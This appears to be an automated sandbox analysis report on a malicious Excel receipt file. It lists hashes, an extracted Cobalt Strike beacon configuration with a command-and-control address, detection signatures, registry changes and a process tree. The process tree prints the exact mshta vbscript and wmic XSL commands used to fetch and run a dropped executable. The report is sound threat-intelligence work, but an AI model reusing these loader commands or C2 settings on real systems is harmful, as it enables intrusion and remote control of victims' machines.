Reciept 0198478.xlsb

General

Target: Reciept 0198478.xlsb
Filesize: 67KB
Completed: 06-07-2021 15:41
Score: 10/10
MD5: 16b275e48c1d27c448b4ed772206315c
SHA1: 317988ea2f7fa8fa288850adce94bf2543bbd8d0
SHA256: d032d57e8f366c59979f536722b5cfbded08b94fc032da27220df46dfcd43208

Malware Config

Extracted

Family: cobaltstrike
Botnet: 1359593325
C2: http://94.198.40.11:80/visit.js

Attributes
access_type
512
host
94.198.40.11,/visit.js
http_header1
AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_header2
AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
http_method1
GET
http_method2
POST
polling_time
60000
port_number
80
sc_process32
%windir%\syswow64\rundll32.exe
sc_process64
%windir%\sysnative\rundll32.exe
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCHFcV/jTWIWbMLGsg/xD3cCk0yHN+dWUBeSAZEdvXFEiawkFkWyJWyGyT0NbgSrwHmz+krYJY6l6YOoUNPWMNc6YpuQUYrBiilMX6rDkmmqUqem2tP6G4E6nBva8DOwNu671c8iFZeK4M8s6PPnUDuEuSHchHBLc5wV6Ew7BLO5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
unknown1
4096
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
uri
/submit.php
user_agent
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
watermark
1359593325
Signatures 13

Tactics: Defense Evasion, Discovery
  • Cobaltstrike

    Description

    Detected malicious payload which is part of Cobaltstrike.

  • CryptOne packer

    Description

    Detects CryptOne packer defined in NCC blogpost.

    Reported IOCs

    resource | yara_rule
    behavioral1/files/0x00030000000130db-66.dat | cryptone
  • Blocklisted process makes network request
    WMIC.exe

    Reported IOCs

    flow | pid | process
    6 | 932 | WMIC.exe
  • Downloads MZ/PE file
  • Executes dropped EXE
    e15k9.exe

    Reported IOCs

    pid | process
    1052 | e15k9.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry
    EXCEL.EXE

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | EXCEL.EXE
  • Modifies Internet Explorer settings
    EXCEL.EXE, mshta.EXE

    TTPs

    Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | EXCEL.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | mshta.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | EXCEL.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | EXCEL.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | EXCEL.EXE
    Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt | EXCEL.EXE
  • Suspicious behavior: AddClipboardFormatListener
    EXCEL.EXE

    Reported IOCs

    pid | process
    304 | EXCEL.EXE
  • Suspicious use of AdjustPrivilegeToken
    WMIC.exe

    Reported IOCs

    description | pid | process
    Token: SeIncreaseQuotaPrivilege | 932 | WMIC.exe
    Token: SeSecurityPrivilege | 932 | WMIC.exe
    Token: SeTakeOwnershipPrivilege | 932 | WMIC.exe
    Token: SeLoadDriverPrivilege | 932 | WMIC.exe
    Token: SeSystemProfilePrivilege | 932 | WMIC.exe
    Token: SeSystemtimePrivilege | 932 | WMIC.exe
    Token: SeProfSingleProcessPrivilege | 932 | WMIC.exe
    Token: SeIncBasePriorityPrivilege | 932 | WMIC.exe
    Token: SeCreatePagefilePrivilege | 932 | WMIC.exe
    Token: SeBackupPrivilege | 932 | WMIC.exe
    Token: SeRestorePrivilege | 932 | WMIC.exe
    Token: SeShutdownPrivilege | 932 | WMIC.exe
    Token: SeDebugPrivilege | 932 | WMIC.exe
    Token: SeSystemEnvironmentPrivilege | 932 | WMIC.exe
    Token: SeRemoteShutdownPrivilege | 932 | WMIC.exe
    Token: SeUndockPrivilege | 932 | WMIC.exe
    Token: SeManageVolumePrivilege | 932 | WMIC.exe
    Token: 33 | 932 | WMIC.exe
    Token: 34 | 932 | WMIC.exe
    Token: 35 | 932 | WMIC.exe
    Token: SeIncreaseQuotaPrivilege | 932 | WMIC.exe
    Token: SeSecurityPrivilege | 932 | WMIC.exe
    Token: SeTakeOwnershipPrivilege | 932 | WMIC.exe
    Token: SeLoadDriverPrivilege | 932 | WMIC.exe
    Token: SeSystemProfilePrivilege | 932 | WMIC.exe
    Token: SeSystemtimePrivilege | 932 | WMIC.exe
    Token: SeProfSingleProcessPrivilege | 932 | WMIC.exe
    Token: SeIncBasePriorityPrivilege | 932 | WMIC.exe
    Token: SeCreatePagefilePrivilege | 932 | WMIC.exe
    Token: SeBackupPrivilege | 932 | WMIC.exe
    Token: SeRestorePrivilege | 932 | WMIC.exe
    Token: SeShutdownPrivilege | 932 | WMIC.exe
    Token: SeDebugPrivilege | 932 | WMIC.exe
    Token: SeSystemEnvironmentPrivilege | 932 | WMIC.exe
    Token: SeRemoteShutdownPrivilege | 932 | WMIC.exe
    Token: SeUndockPrivilege | 932 | WMIC.exe
    Token: SeManageVolumePrivilege | 932 | WMIC.exe
    Token: 33 | 932 | WMIC.exe
    Token: 34 | 932 | WMIC.exe
    Token: 35 | 932 | WMIC.exe
  • Suspicious use of SetWindowsHookEx
    EXCEL.EXE

    Reported IOCs

    pid | process
    304 | EXCEL.EXE
    304 | EXCEL.EXE
    304 | EXCEL.EXE
    304 | EXCEL.EXE
    304 | EXCEL.EXE
  • Suspicious use of WriteProcessMemory
    taskeng.exe, mshta.EXE, WMIC.exe

    Reported IOCs

    description | pid | process | target process
    PID 1872 wrote to memory of 1652 | 1872 | taskeng.exe | mshta.EXE
    PID 1872 wrote to memory of 1652 | 1872 | taskeng.exe | mshta.EXE
    PID 1872 wrote to memory of 1652 | 1872 | taskeng.exe | mshta.EXE
    PID 1652 wrote to memory of 932 | 1652 | mshta.EXE | WMIC.exe
    PID 1652 wrote to memory of 932 | 1652 | mshta.EXE | WMIC.exe
    PID 1652 wrote to memory of 932 | 1652 | mshta.EXE | WMIC.exe
    PID 932 wrote to memory of 1052 | 932 | WMIC.exe | e15k9.exe
    PID 932 wrote to memory of 1052 | 932 | WMIC.exe | e15k9.exe
    PID 932 wrote to memory of 1052 | 932 | WMIC.exe | e15k9.exe
    PID 932 wrote to memory of 1052 | 932 | WMIC.exe | e15k9.exe
Processes 5
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Reciept 0198478.xlsb"
    Enumerates system info in registry
    Modifies Internet Explorer settings
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    PID:304
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {E9EE2BCF-C3B6-492F-9EFA-61190C2AE8AA} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
    Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Windows\system32\mshta.EXE
      C:\Windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qDialogSeriesAxes.xsl"" & Chr(34)),0:close")
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\System32\wbem\WMIC.exe
        "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qDialogSeriesAxes.xsl"
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        PID:932
        • C:\Windows\Temp\e15k9.exe
          "C:\Windows\Temp\e15k9.exe"
          Executes dropped EXE
          PID:1052
Network
MITRE ATT&CK Matrix
Tactic columns: Collection, Command and Control, Credential Access, Defense Evasion, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation
Downloads
  • C:\ProgramData\qDialogSeriesAxes.xsl
    MD5: ed9a97566e5179a4793dad89b79f3c8b
    SHA1: 3aba6229322c12118a7999b35387045159429078
    SHA256: c6ce5cf41a799c6c427a8facae15fa9ac40eb3562132189c72e1398178c74981
    SHA512: 08f827a3bea007feae33e69f43a09cfcb08f0f636d1eab3d937203bad63d94cd9f99312f162cefb1217e115d5ae3985b6202f2b773212134c540e01fe2d071f1
  • C:\Windows\Temp\e15k9.exe
    MD5: 9a2e1bb9ad6f1ccfeaa4c2c55637ae3b
    SHA1: d42d55cab8637f847efdc1a01bcd5bb2d4668b7d
    SHA256: b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6
    SHA512: c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6
  • memory/304-59-0x000000002F911000-0x000000002F914000-memory.dmp
  • memory/304-60-0x00000000716F1000-0x00000000716F3000-memory.dmp
  • memory/304-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
  • memory/932-63-0x0000000000000000-mapping.dmp
  • memory/1052-65-0x0000000000000000-mapping.dmp
  • memory/1052-70-0x0000000000400000-0x0000000000453000-memory.dmp
  • memory/1052-67-0x0000000075971000-0x0000000075973000-memory.dmp
  • memory/1052-68-0x00000000002C0000-0x00000000002F3000-memory.dmp
  • memory/1052-69-0x0000000000220000-0x0000000000267000-memory.dmp
  • memory/1052-71-0x0000000001D90000-0x0000000001DCD000-memory.dmp
  • memory/1652-62-0x0000000000000000-mapping.dmp